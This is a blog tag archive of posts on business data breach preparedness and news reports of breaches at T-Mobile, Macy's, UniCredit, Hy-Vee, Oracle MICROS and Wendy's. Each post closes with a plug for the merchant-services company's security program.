Tag Archives: data breach

data breach glitchy words 187141456

How Businesses Should Prepare For a Data Breach [2023 Update]

You might not want to think about it, but there is always a potential your business could be hit by a data breach. The info you keep on your customers, your finances, and other sensitive factors could be at risk of being lost. You can prepare for a data breach if you look at how you’re managing your business and how you recognize whatever may work at any moment.

Establish a Relationship With Your IT Department 

what is a data breach

The first way to prepare for a data breach is to look at how your IT department operates. Most businesses assume their IT departments are all about keeping their websites online. But IT is also about reviewing data connections and preventing hostile parties from getting online.

You can produce a better relationship with your IT department to help establish more control over possible threats. You can request many points from your IT department to ensure everyone’s safety and protection while online:

  • Establish parameters for how you’ll use security setups and features for your workplace. These include hardware and software-based firewalls and antivirus programs.
  • Communicate with your IT department on how you’re handling your customers’ data. You can share how your business is complying with CCPA standards.
  • Have a fractional privacy officer on hand to help you review your IT efforts. A privacy officer can identify possible flaws and issues with your security and IT functions and provide guidance on how you can fix any problems you notice.
  • Produce a data mapping platform where you’ll illustrate how the data you collect will travel and where people can find and use it as necessary. The data map should include enough locations surrounding how you’re managing data and making it accessible for multiple situations.

Every system in your workplace needs proper controls to ensure you’re keeping your data secure and protected. Be certain when running your business that you have a plan for how you’re managing your data as necessary and that there’s a plan for where everything goes.

Data Breach – Plan a Response Team

A data breach response team can review whatever threats come with a breach and identify how to resolve the issue sooner. You can establish a response team with multiple positions:

  • Every response team needs a leader that will run the reaction effort.
  • A customer care representative will contact the public and provide info on the breach. The worker should ensure all customers are confident the situation works well.
  • A few members of the IT team should review the compromised data and identify any hacking issues or other threats.
  • The C-Suite team will also plan a response to the breach surrounding how data moves and how it will be preserved and saved. Any backups for whatever is working here will be necessary for everyone’s safety and protection.

All members of your response team should be easily accessible when the time for work comes. Everyone should have a plan for how they’ll manage the data in hand and keep it under control.

Data Breach - Plan a Response Team

Plan a Least Privilege Model

A least privilege model is a platform where your employees will only have access to the smallest amount of data necessary to manage your work. You can incorporate this point into your data protection plan to reduce the risk of employees spreading excess data amounts.

You can also use a tokenization system that disguises identifiable data and keeps the content in a secure space where it cannot be decoded. This point works with a least privilege model to reduce the identifiable data that appears when handling a transaction.

RBAC Also Helps

Another point to plan entails the roles people have when accessing data. An RBAC or role-based access control system will assign permissions to each employee based on their roles. While they can still interact with the least amount of necessary data, you can restrict your employees surrounding who will review the specific data you’re managing in your work. People who have more experience with certain systems may be allowed access to those setups, while those with less experience or work will not handle as many items here.

Data breach - role based access

Review Your Current System

Check your current data storage system to reduce your risk of possible damage if your data ever becomes lost. Your current review can include a check on a few points to ensure everything you manage stays functional:

  • Look at your current encryption system. The encryption you utilize should be secure and should target payment info and identifiable data on customers.
  • Keep all software current by using the proper installations, patches, and other updates. Proper updates ensure all possible security risks are closed off, reducing the risk or severity of potential hacks or disruptions.
  • Monitor whatever software programs or other solutions you use when controlling data. Any security programs you use should be easy to control and configure.
  • Review the passwords people are using when handling data. All passwords should be kept private and complex to where they are hard for people to predict. You could establish a system where each password must have a specific number of characters or certain types of items.

Be Prepared For Possible Failures

While you should plan to succeed in everything you do, you should never assume you’re going to be successful every time you manage your business’ data. Having a response plan can make a difference, as it helps you contain possible damage and reduce the risk of the harm becoming worse than necessary. Proper control over your situation and how you’re managing your business is ideal to your success.

A data breach can be a scary concern for you to consider when running your business. But it doesn’t have to be a dramatic risk if you look at how you respond to the threat. Be sure you look at how you’re managing your data breaches and that you have a plan for what to do if one occurs. The work should be about ensuring everything stays safe in your business.

More Than a Million T-Mobile Prepaid Customers Impacted by Data Breach

In the United States, prepaid wireless services took a while to catch on; while customer demand was certainly there from the beginning, telecoms were somewhat apprehensive about deviating from the tried-and-true service contract and monthly billing arrangements. Eventually, American providers of wireless services gave into demand, and they marketed this option as being more convenient, more flexible, and just as secure as cell phone service contracts.

E-commerce Data Security BreachUnlike other countries where the regulation of prepaid wireless services tends to be more relaxed in terms of requesting information from users, a prepaid SIM account in the U.S. requires the collection of personally identifiable information; moreover, each prepaid customer becomes an account record, one that can be tied to financial information to make it easier to add credit, airtime, and services. With regard to data security, there is no difference between wireless contracts and prepaid arrangements, and this is something that T-Mobile was recently forced to contend with.

According an official press release issued by T-Mobile on November 22, a data breach affected about 1.12 million prepaid service customers, which represents less than 1.5% of their total user base. The incident occurred in early November, and it looks like a standard cybercrime situation and not an insider attack. Affected customers received SMS notifications about the incident, and they were urged to change their passwords as well as the PIN codes they use for easy account access.

Fortunately, the cyber perpetrators were not able to steal financial records associated with the accounts, which means that credit cards and social security numbers were not compromised; nonetheless, the stolen records include names, phone numbers, account numbers, and billing addresses. In the hands of cybercrime groups dedicated to identity theft, this type of information can be very dangerous.

Earlier this year, hackers were somehow able to access customer records of Sprint wireless subscribers, and they did so by exploiting a vulnerability on a website that caters to owners of Samsung smartphones. Similar to the T-Mobile incident, financial records were not accessed, and this is probably related to compliance with Payment Card Industry Data Security Standards.

For the payment processing industry, prepaid wireless services have become a substantial segment of their business. Unlike wireless contracts, which are mostly settled once per month and sometimes just once per year for customers seeking deep discounts, topping up prepaid smartphones with voice minutes or blocks of data is something that they may do a couple of times each week, and even more often when carriers send out notifications with coupons and special deals. The most privacy-conscious will only “top up” their cell phones with cash; however, quite a few end up linking credit and debit cards for convenience.

Macy’s Website Hacked

This week, major U.S. department store chain Macy’s revealed that they were targeted by a malicious online cyber attack that attempted to steal the payment information of their customers.

The macys.com website became infected on October 7 with what they’re only referring to as “unauthorized code” on their “My Wallet” and “Checkout” pages. This allowed the cyber thieves to capture credit card data from unaware customers attempting to use either of those two pages. Macy’s has stated that it wasn’t until a whole week after the site was compromised, on the 15th of October, that they became alerted to the breach.

Cyber Security Data Breach ProtectionThe information that the attackers were able to access included detailed personal information, such as the customers’ full names and addresses, email addresses, their phone numbers, and financial information such as credit card numbers, credit card security codes, and the card expiration details of those that typed the information into one of the pages that had been compromised.

In a statement released by Macy’s, they have confirmed that they are investigating the incident while adding that they have taken preventative steps that will hopefully go some way in avoiding this sort of situation happening again in the future. In addition, Macy’s has insisted that it was only a small amount of their macys.com customers who were affected by the hack and they will be providing any customers who were affected one year of credit monitoring for free.

In another statement released by a Macy’s spokesperson, they said the following: “We are aware of a data security incident involving a small number of our customers on Macys.com. We have investigated the matter thoroughly, addressed the cause and have implemented additional security measures as a precaution. All impacted customers have been notified, and we are offering consumer protections to these customers at no cost.”

First spotted around 2010, intrusions such as this – known as Magecart attacks due to the preference of attackers to target Magento e-commerce platforms – have seen a sudden upsurge over the past two years. Magecart attacks typically involve attackers compromising the legitimate online store of a company in order to siphon customers’ account details and credit card numbers while making purchases by placing malicious JavaScript skimmers on payment forms.

Cybersecurity firm RiskIQ recently published a report on the Magecart cyber thieves in which they stated the following: “Magecart is a rapidly growing cybercrime syndicate comprised of dozens of subgroups that specialize in cyber attacks involving digital credit card theft.”

E-skimming attacks have become so widespread in recent years that over 18,000 domains have been affected, and the FBI has had to issue a warning to businesses cautioning them of the cyber threat and urging that they have sufficient barriers put in place to ensure that they are fully protected should an attack occur. Methods such as keeping software up to date, segregating critical network infrastructure, enabling multi-factor authentication and keeping an eye out for phishing attacks have all been suggested by the FBI in their warning.

And one last thing to consider if you are a merchant and you are worried about data breaches affecting your bottom line: Host Merchant Services Data Breach Security Program. Click that link to download a PDF explaining the value-added service HMS provides its merchants that goes above and beyond just simple PCI Compliance and helps ensure a merchant’s peace of mind.

Online Retail Fraud on the Rise

According to the 2019 Fraud Attack Index by e-commerce security company Forter, attempts at defrauding online retailers have, for the second year consecutively, increased with online electronics and food and beverage retailers seeing the biggest hits.

After going through merchant and transaction data, Forter determined the rate at which e-commerce fraud attacks occur has increased between 2017 and 2018 over several different verticals.

Electronics

Electronic Retail Fraud SecurityFraud targeted at electronics retailers shot up by a huge 73% in 2018 compared to the year before. Electronic devices often come with hefty price tags, and they can be easily resold, making them so appealing to fraudsters. Forter’s analysis showed that customers are more than prepared to purchase their electronic goods from third-party sites in order to score a better deal, and many fraudsters will list their stolen items as “refurbished” items.

Food and Beverage

Fraudulent attacks against food and beverage companies saw an even bigger increase between 2017 and 2018 with a 79% increase in attacks. This comes following a 60% increase between 2016 and 2017. Forter’s analysis suggests that lower-priced online food and beverage items will be where fraudsters typically test out stolen cards or e-wallets, before then going onto more expensive higher-ticket items.

Clothing

Fraud attempts in the online clothing world rose by 47% between 2017 and 2018. Clothing has always been an appealing and attractive option to criminals, with bulk items being resold with relative ease. Much as was the case with electronic items, many legitimate buyers will be eager to purchase their clothing from third-party resale sites.

Bots can also be used by fraudsters to buy up large quantities of any limited edition clothing runs which they’ll then sell on with substantial mark-ups.

Jewelery and Luxury Items

Jewelry Retail Security MerchantsIt goes without saying that criminals have always been attracted to the high value of jewelry. 2018 saw a 19% year-on-year increase in attacks towards online sellers of jewelry and other luxury items.

The security company Forter’s study looked into many often undertaken means by which fraudulent attacks are typically launched upon online retailers. Account takeovers, whereby criminals will unlawfully gain access to an unsuspecting customer’s account with the aim to make illegal purchases, or even redeem loyalty points, grew by 45% in 2018 when compared to 2017. Fraudulent attacks coming from fraud rings, or even online criminals grouping together to commit fraud together grew by 26% year-on-year.

What saw the sharpest increase was policy abuse, which entails cheating retailers through discount codes and coupons, creating multiple accounts, or overusing referral reward programs. This saw an increase of a whopping 170%, whereas stricter e-commerce returns policies saw the more historically traditional fraudulent returns abuse drop by a huge 90%.

As of 2019, these are the 10 U.S. states with the highest rates of identity theft and fraud:

  • 1. District of Columbia
  • 2. California
  • 3. Nevada
  • 4. New Hampshire
  • 5. South Carolina
  • 6. Delaware
  • 7. Louisiana
  • 8. Texas
  • 9. New York
  • 10. Florida

And one last thing to consider if you are a merchant and you are worried about data breaches or fraud affecting your bottom line: Host Merchant Services Data Breach Security Program. Click that link to download a PDF explaining the value-added service HMS provides its merchants that goes above and beyond just simple PCI Compliance and helps ensure a merchant’s peace of mind.

UniCredit Unveils Data Breach That Involves 3 Million Users

On Monday, UniCredit revealed to the public that a 2015 file comprised of names, addresses, phone numbers, and email addresses pertaining to more than 3 million of their customer base was compromised and leaked.

This occurred in spite of spending an additional €2.4 billion over the past 3 years on cyber security enhancements to their IT systems. Despite UniCredit catering to a wide range of customers worldwide, the records leaked in Monday’s attack were related to only their Italian client base.

Cyber Security Data Breach ProtectionThe data breach was reported to authorities last Thursday, October 24th, while a company representative relayed the information to Reuters. While there were no details with regards to how the breach was able to happen, the spokesman did confirm that there is an internal investigation ongoing. Italian police are also examining the possibility that other crimes may have been committed in conjunction with the security breach.

This is the third such incident of its kind to affect UniCredit after two previous data breaches in September to October of 2016 and June to July of 2017 in which the private information of over 400,000 Italian customers was compromised. It is not thought that this latest attack is linked to those two in any way, however, as they were the result of a third party accessing customer data without any form of authorization or consent.

The Italian bank was quick to assure customers in their statement issued on Monday, however, that there was no serious financial information leaked in the data breach, nor were there any compromising information leaked that could lead to unauthorized access of customer accounts. The data lost by those affected is Personally Identifiable Information (PII) which won’t be able to lead to any unauthorized transactions. It is, however, usually used for social engineering campaigns, and it can potentially aid those who wish to commit identity theft.

UniCredit customers who may have been affected by the breach will have been contacted by them either by online banking notifications or via the post. A new business plan is expected to be presented by the bank in early December.

And one last thing to consider if you are a merchant and you are worried about data breaches affecting your bottom line: Host Merchant Services Data Breach Security Program. Click that link to download a PDF explaining the value-added service HMS provides its merchants that goes above and beyond just simple PCI Compliance and helps ensure a merchant’s peace of mind.

Companies Ask Congress For Data Protection Law

Dozens of CEOs from companies like IBM and Amazon has sent an open letter to Senate and House leaders asking for comprehensive data protection laws. The letters claim state consumer privacy laws simply aren’t enough as they vary widely, lead to confusion, and threaten the competitiveness of the United States. The companies claim a federal law would create a more stable policy environment that allows companies to create products within precise and predictable boundaries.

The letter was sent on behalf of Business Roundtable, an association of CEOs of some of the largest companies in the United States. The CEOs of Walmart, State Farm, Salesforce, Qualcomm, IBM, AT&T, Visa, Mastercard, JP Morgan Chase, and Amazon are among those who have signed the letter.

The group blames a rising number of different state privacy regulations as a leading reason for complicated consumer privacy in the country. This patchwork of regulations has also increased complications for companies that must comply with laws across various jurisdictions and states.

E-commerce Data ProtectionOne of the most comprehensive forms of privacy protection passed at the state level is the California Consumer Protection Act (CCPA), a landmark privacy law that will go into effect in 2020. Beginning in 2020, Americans will have the right to demand a company disclose what personal data they have collected about the consumer and ask the company to delete the information or not share it with third parties. Companies will also need to be more upfront in telling consumers what data they collect.

While CCPA is a state law that technically only applies in California, it also covers any out-of-state merchant who sells to California or displays a website in the state. That means that any merchant will have a strong interest in complying with CCPA rather than leaving the fifth largest economy in the world.

With a single federal law for privacy and data protection that would supersede state laws, product design, data management, and compliance would be simplified.

However, some privacy advocates argue the tech companies are more interested in protecting their own interests as combining privacy regulations under a federal umbrella would allow lobby groups to water down meaningful protections. With too much protection, companies may have trouble selling certain types of consumer data to online advertisers, a large and growing area of business.

US Congress Meeting Data Protection ActThe Business Roundtable released its own consumer privacy framework it wants Congress to consider as the basis for a future privacy law. Their proposal includes many provisions of the General Data Protection Regulation (GDPR) of the European Union in more broad terms.

In February, the US Government Accountability Office (GAO), a government auditing agency, gave Congress permission for passing a national data privacy law to improve consumer protections much like the GDPR. GAO also recommended placing the FTC in charge of enforcing future privacy law in the United States.

By June, reports surfaced that lawmakers had reached a roadblock attempting to create a national privacy law. Senators could not agree on how strict rules should be or on the key items of the bill.

And one last thing to consider if you are a merchant and you are worried about data breaches affecting your bottom line: Host Merchant Services Data Breach Security Program. Click that link to download a PDF explaining the value-added service HMS provides its merchants that goes above and beyond just simple PCI Compliance and helps ensure a merchant’s peace of mind.

FAQ About Companies Ask Congress For Data Protection Law

Why are companies asking Congress for a data protection law?

Companies are requesting a data protection law from Congress to establish a unified framework for handling personal data in the United States. The absence of a comprehensive federal law has led to a patchwork of state-level regulations, creating compliance complexities for businesses operating across multiple jurisdictions. u003cbru003eu003cbru003eCompanies recognize the need for clear guidelines and standardized practices to protect consumer data, enhance cybersecurity, and build trust with their customers. A federal data protection law would provide a consistent set of rules and requirements, ensuring companies can navigate the regulatory landscape more effectively while safeguarding individuals’ privacy rights.

What are the benefits of a federal data protection law?

A federal data protection law offers several advantages. Firstly, it provides a clear and consistent regulatory framework for businesses to follow, reducing ambiguity and compliance burdens. It establishes baseline standards for data privacy, security, and breach notification, enhancing consumer protection. u003cbru003eu003cbru003eA unified law simplifies compliance for companies operating nationally, minimizing the costs associated with meeting varying state-level requirements. It also fosters trust between businesses and consumers, as individuals can have greater confidence that their personal information is being handled responsibly. Additionally, a federal law enables improved cross-border data transfers, facilitating international business operations and promoting economic growth.

What are the challenges to passing a federal data protection law?

Several challenges hinder the passage of a federal data protection law. First and foremost is the complexity of crafting legislation that balances the interests of businesses, consumers, and government agencies. Finding consensus on issues such as defining personal data, determining appropriate consent mechanisms, and establishing penalties for non-compliance can be challenging.u003cbru003eu003cbru003ePolitical divisions and differing priorities among lawmakers also contribute to delays. Additionally, lobbying efforts from various industries may influence the content and scope of the law, potentially diluting its effectiveness. Striking a balance between protecting privacy rights and enabling innovation is a delicate task, requiring careful negotiation and compromise among stakeholders.

Hy-Vee Data Breach

In the middle of August 2019, convenience store and supermarket giant Hy-Vee reported a data breach incident involving its point of sale systems. Few details about the breach were initially given; however, it took about a week for cyber security researchers to take a closer look at the situation and provide more information on the matter. Before discussing some of the known details about the breach, it should be noted that it does not directly involve credit card processing insofar as clearing payments; it is isolated to point of sale equipment and its supporting data network.

Hy-Vee is a major brand in the American Midwest; the company operates convenience stores, supermarkets, snack bars, and gas stations from South Dakota to Missouri plus six other states. As can be expected from a merchant of this magnitude, many locations handle payments through a shared point of sale (POS) network. What is known thus far about the incident is that hackers targeted the POS and credit card reader terminals at the company’s gas stations, cafes, Market Grille restaurants and Wahlburger fast-food eateries. The POS and credit card processing systems at Hy-Vee supermarkets and convenience stores were not affected because they operate on a separate network. 

Gas Station Point of Sale Data Breach

According to an investigation by Brian Krebs, a respected information security researcher, the Hy-Vee breach resulted in the theft of about five million credit and debit card numbers from customers in 35 states as well as from a few countries in Europe and the Middle East. Unfortunately, these records found their way to underground cybercrime markets where they are being sold for malicious purposes. The specific market mentioned by Krebs is known as Joker’s Stash, and the name of the data dump is “Solar Energy;” the sellers are asking between $17 and $35 per record.

Since Hy-Vee is still investigating the breach, individual cardholders who may have been affected have not been notified; moreover, the locations and the specific times when the transactions were compromised have not been revealed. Another aspect of the investigation that has not been mentioned is related to the breach mechanism, but the Krebs report hinted that the POS network may have been infected with malware that intercepted data stored in the magnetic stripe of the cards. POS equipment at Hy-Vee supermarkets, convenience shops, and drugstores feature point-to-point encryption, but this does not seem to be the case in the POS equipment installed at the affected Hy-Vee gas stations, cafes and restaurants.

While the Hy-Vee data breach can result in credit and debit card cloning, the company does not think that identity theft is something that shoppers should worry about because of the type of information stolen. Nonetheless, two lessons that merchants can learn from this case include: point-to-point encryption is always preferred for POS equipment, and cybercrime insurance policies are more important than ever. It is too early to tell if the burden of liability should fall on Hy-Vee or on the vendor managing the POS network, but this is something that merchants should think about. When credit and debit card transactions are encrypted from the reader to the terminal, data breaches are significantly mitigated. Should a POS or payments processor fail to protect transactions accordingly, a good insurance policy can shield merchants from legal complaints that may arise from a data breach. 

Oracle MICROS Hackers

Oracle MICROS Hackers Also Hacked 5 Other Companies

Leave a reply

American companies that use credit card processing and merchant services are on high alert after a Russian hacking group breached the servers of various POS or point of sale systems.

The first victim of the breach was tech giant Oracle, which in mid-2016 acquired MICROS Systems, a major provider of POS solutions for the retail and hospitality industries.

Cyber-Attack on Oracle MICROS

Following the cyber-attack on Oracle MICROS, five more providers of cash registers reported being hacked by the same Russian crew.

The companies targeted by the hacking group have an important business aspect in common: they all offer cloud cash registers, which are advanced POS or point of sale systems integrated with functions such as employee scheduling, customer relationship management (CRM), credit card processing, marketing intelligence, merchant services, and more.

Security analysts who covered the aforementioned incidents explained that the Russian hackers were specifically looking for individual customer account records, which means that they were trying to get their hands on credit card data. A likely suspect has already been mentioned, the Carbanak Gang.

An initial security investigation indicates that Oracle became aware of the breach when it detected a malicious code in a few servers used by nearly 700 customers. The attack also included a help desk system used by Oracle to provide technical support to clients. This is very concerning because hackers could gain the ability of intercepting service tickets and spoofing support agents.

It is not unusual to see hacking crews such as the Carbanak Gang being suspected of pulling off major cyber heists. Internet security experts have been following this cybercrime group for a while; they believe that this group may be associated with the Bratva, which is the name insiders use to describe the Russian mafia.

It is interesting to note that one of the reasons major cyber-attacks come from Russia is that computer education has major support in public schools and state-funded universities. It is believed that the Russian government often recruits malicious hackers to work as cyber warfare agents.

How MICROS Point of Sale Systems Got Hacked

Leave a reply

Software giant Oracle Corporation became the victim of a data breach last week when a Russian organized cybercrime group gained access to hundreds of their systems. According to security experts the group gained access through a customer support portal for companies that use the MICROS point-of-sale software from Oracle. The MICROS software payment system is an extremely widely used credit card processing system and is used in more than 330,000 cash registers throughout the world. This makes MICROS undoubtedly one of the most used POS systems worldwide, and its compromising is a cause of great concern to both consumers and businesses alike.

The extent of the breach is currently unknown as Oracle has been somewhat slow to comment on what exactly has occurred, so far only revealing that malware was found in some systems run by MICROS and both unauthorized network connections and malicious processes had to be blocked. Oracle has also informed consumers that their credit card processing system ensures that data is encrypted throughout MICROS systems and which means they are less likely to be at risk. It is unclear at this time if customer data was even seized, however MICROS is encouraging all of its customers to err on the side of caution and reset their passwords and check their credit card statements.

A source with ties to the Russian criminal underground has claimed that this same group is tied to or responsible for stealing over $1 billion from banks worldwide last year through a series of malicious data breaches and hacking of merchant services worldwide. If this claim is true, this gang certainly knows what they are doing and as a result the breach could potentially be much larger than anticipated. Oracle themselves say initially they expected the data breach to be somewhat localized to just a handful of systems but soon realized that it had reached in excess of 700 systems for merchant services.

MICROS is a massive service throughout industries ranging from hospitality to standard retail cash registers, and it’s wide span of use should be cause for concern for a great deal of businesses. While it is unlikely that this data breach was an attempt to steal personal info from consumers, given the gang’s past, it cannot be completely ruled out as a possibility. However, it is far more likely that this was a robbery, perhaps of funds or at worse accessing various credit card processing information through MICROS systems in order to steal from individuals.

Regardless of their intentions, the MICROS data breach is being touted as nothing less than a “very big deal.”  It is potentially one of the largest data breaches in recent memory and one that certainly has the potential to be the most impactful to many consumers and businesses worldwide. It just goes to show that no company can be too secure when it comes to their merchant services and credit card processing systems.

Data Breach at Wendy’s Expands to Over 1000 Locations

Leave a reply

Data security issues at Wendy’s have now been super-sized.

Following whispers of a data breach in January, Wendy’s finally confirmed payment security issues in May, when spokesmen admitted fewer than 300 stores had been affected by malware. Now, the company admits the real number of compromised restaurants is over 1,000.

Thieves installed malware on POS card terminals to capture card numbers, cardholder names, verifications values, expiration dates, service codes and other critical data. Wendy’s stated that CVV codes were not at risk. The malware has been called “highly sophisticated in nature and extremely difficult to detect.”

The initial claim of fewer than 300 affected stores was cast into doubt by reports from card issuers that fraudulent charge volume indicated a far larger distribution throughout the chain’s 5,800 U.S. locations. Wendy’s states that the attack came in two separate waves, making it difficult to determine the total size of the data breach when it was first detected. Investigators first determined the scope as only 300 locations, only to be hit by a second, mutated strain of the malware soon thereafter.

The attack appears to have been the result of compromised security credentials used for remote access by third-party POS service companies. These companies are often hired by franchisees to manage POS systems in their restaurants, and most access them remotely. Of the 5,800 Wendy’s restaurants in the U.S., only about 630 are owned and operated by Wendy’s itself, with the remainder in the hands of local franchise owners. None of the company-owned stores have been implicated in the data breach.

In response to their discovery of the larger scale of the breach, Wendy’s has compiled a searchable database of affected locations. This database is accessible to customers on the company website.

The affected locations had not yet moved to the use of EMV chip cards. Gavin Waugh, vice president and treasurer at The Wendy’s Company, believes that the attack might not have been prevented by use of EMV. Wendy’s declined to provide a timetable for the completion of the rollout of EMV to their network of restaurants.

Gartner Group analyst Avivah Litan states that although many locations have received and installed EMV-capable terminals, not all have activated them. She acknowledged that there is a backlog of requests at the companies who certify EMV readiness for merchants ready to move to the new standard.